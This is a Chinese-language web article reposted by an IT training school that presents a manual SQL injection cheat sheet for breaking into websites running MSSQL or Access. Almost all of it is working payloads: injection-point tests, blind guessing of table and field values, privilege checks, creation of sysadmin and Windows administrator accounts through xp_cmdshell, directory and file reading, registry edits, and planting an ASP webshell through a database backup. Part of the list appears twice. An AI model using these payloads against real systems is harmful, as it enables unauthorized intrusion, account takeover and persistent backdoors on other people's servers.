看看黑客如何手工注入方法入侵網站的
我們在入侵網站的時候,有時候直接靠工具是無法找到注入點的,所以很多時候都要用到手工注入,下面列舉一些方法:
1.判斷是否有注入;and 1=1 ;and 1=2
2.初步判斷是否是mssql ;and user>0
3.注入參數是字符’and [查詢條件] and ”=’
4.搜索時沒過濾參數的’and [查詢條件] and ‘%25′=’
5.判斷數據庫系統(tǒng)
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜數據庫 ;and (select Count(*) from [數據庫名])>0
7.猜字段 ;and (select Count(字段名) from 數據庫名)>0 1.判斷是否有注入;and 1=1 ;and 1=2
2.初步判斷是否是mssql ;and user>0
3.注入參數是字符’and [查詢條件] and ”=’
4.搜索時沒過濾參數的’and [查詢條件] and ‘%25′=’
5.判斷數據庫系統(tǒng)
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜數據庫 ;and (select Count(*) from [數據庫名])>0
7.猜字段 ;and (select Count(字段名) from 數據庫名)>0
8.猜字段中記錄長度 ;and (select top 1 len(字段名) from 數據庫名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 數據庫名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 數據庫名)>0
10.測試權限結構(mssql)
;and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘serveradmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘setupadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘securityadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’));–
;and 1=(select IS_MEMBER(‘db_owner’));–
11.添加mssql和系統(tǒng)的帳戶
;exec master.dbo.sp_addlogin username;–
;exec master.dbo.sp_password null,username,password;–
;exec master.dbo.sp_addsrvrolemember sysadmin username;–
;exec master.dbo.xp_cmdshell ‘net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;–
;exec master.dbo.xp_cmdshell ‘net user username password /add’;–
;exec master.dbo.xp_cmdshell ‘net localgroup administrators username /add’;–
12.(1)遍歷目錄
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ‘c:\’
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in(‘上步得到的paths’))>)
(2)遍歷目錄
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–
;insert temp exec master.dbo.xp_availablemedia;– 獲得當前所有驅動器
;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\’;– 獲得子目錄列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\’;– 獲得所有子目錄的目錄樹構
;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp’;– 查看文件的內容
13.mssql中的存儲過程
xp_regenumvalues 注冊表根鍵, 子鍵
;exec xp_regenumvalues ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多個記錄集方式返回所有鍵值
xp_regread 根鍵,子鍵,鍵值名
;exec xp_regread
‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'CommonFilesDir’ 返回制定鍵的值
xp_regwrite 根鍵,子鍵, 值名, 值類型, 值
值類型有2種REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'TestValueName’,'reg_sz’,'hello’ 寫入注冊表
xp_regdeletevalue 根鍵,子鍵,值名
exec xp_regdeletevalue ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'TestValueName’ 刪除某個值
xp_regdeletekey ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 刪除鍵,包括該鍵下所有值
14.mssql的backup創(chuàng)建webshell
use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’c:\l.asp’;
15.mssql內置函數
;and (select @@version)>0 獲得Windows的版本號
;and user_name()=’dbo’ 判斷當前系統(tǒng)的連接用戶是不是sa
;and (select user_name())>0 爆當前系統(tǒng)的連接用戶
;and (select db_name())>0 得到當前連接的數據庫
16.簡潔的webshell
use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’g:\wwwtest\l.asp’;
文章由鄭州北大青鳥搜集整理,轉載請注明!
本文由站河南北大青鳥校區(qū)整編而成,如需了解更多IT資訊類的文章、新聞、課程和學習技巧、就業(yè)案例、招生詳情等問題,可以對在線咨詢老師進行一對一問答!
- 上一篇:web代碼安全問題大集合
- 下一篇:16個網絡安全基礎知識典型問答,你知多少呢?
推薦資訊
- 常見php頁面漏洞分析及相關問題解... 2012-12-16
- 鄭州5G手機軟件開發(fā)培訓... 2013-12-03
- 18歲的男孩學什么專業(yè)好... 2023-10-13
- 河南大學生就業(yè)難問題如何緩解... 2012-07-07
- 鄭州計算機職業(yè)技術學院官網... 2021-01-26
熱點資訊
- 如何從外置硬盤中清除感染病毒... 2017-06-11
- 谷歌瀏覽器用戶密碼安全難保... 2017-06-11
- 網站安全性需要注意哪些方面... 2017-06-11
- Linux中服務器軟件為什么需要編譯... 2017-06-11
- 安卓隱患:防毒軟件無法偵測木馬... 2013-08-06